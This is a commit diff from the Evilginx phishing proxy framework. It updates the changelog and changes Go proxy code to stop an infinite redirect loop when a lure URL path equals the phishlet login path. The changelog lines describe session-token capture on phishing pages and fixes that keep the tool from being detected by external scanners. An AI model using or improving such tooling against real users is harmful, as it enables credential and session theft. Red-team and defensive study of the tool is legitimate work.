fixed: infinite redirection loop when lure url was the same as phishlet login path

CHANGELOG

@@ -4,9 +4,11 @@
 - Feature: Added ability to inject `force_post` POST parameters into JSON content body (by [@yudasm_](https://twitter.com/yudasm_)).
 - Feature: Added ability to disable automated TLS certificate retrieval from LetsEncrypt with `config autocert <on/off>`.
 - Feature: Evilginx will now properly recognize origin IP for requests coming from behind a reverse proxy (nginx/apache2/cloudflare/azure).
+- Fixed: Infinite redirection loop if the lure URL path was the same as the login path defined in the phishlet.
 - Fixed: Added support for exported cookies with names prefixed with `__Host-` and `__Secure-`.
 - Fixed: Global `unauth_url` can now be set to an empty string to have the server return `403` on unauthorized requests.
 - Fixed: Unauthorized redirects and blacklisting would be ignored for `proxy_hosts` with `session: false` (default) making it easy to detect evilginx by external scanners.
+- Fixed: IP address `127.0.0.1` is now ignored from being added to the IP blacklist.
 
 # 3.2.0
 - Feature: URL redirects on successful token capture now work dynamically on every phishing page. Pages do not need to reload or redirect first for the redirects to happen.

core/http_proxy.go

@@ -580,10 +580,15 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 					if err == nil {
 						// redirect from lure path to login url
 						rurl := pl.GetLoginUrl()
-						resp := goproxy.NewResponse(req, "text/html", http.StatusFound, "")
-						if resp != nil {
-							resp.Header.Add("Location", rurl)
-							return req, resp
+						u, err := url.Parse(rurl)
+						if err == nil {
+							if strings.ToLower(req_path) != strings.ToLower(u.Path) {
+								resp := goproxy.NewResponse(req, "text/html", http.StatusFound, "")
+								if resp != nil {
+									resp.Header.Add("Location", rurl)
+									return req, resp
+								}
+							}
 						}
 					}
 				}